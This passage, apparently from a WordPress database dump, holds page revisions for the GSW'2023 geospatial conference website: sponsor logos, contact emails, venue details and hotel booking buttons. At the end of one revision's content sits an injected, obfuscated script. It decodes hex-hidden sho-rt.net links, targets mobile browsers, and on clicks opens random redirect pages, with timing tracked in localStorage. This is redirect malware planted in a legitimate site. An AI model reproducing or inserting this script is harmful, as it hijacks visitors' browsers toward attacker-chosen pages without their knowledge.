link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-21 23:49:44','2023-06-21 23:49:44','',3066,'https://gsw2023.com/?p=4736',0,'revision','',0),
(4737,1,'2023-06-21 23:50:08','2023-06-21 23:50:08','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687391337354{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687389578407{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 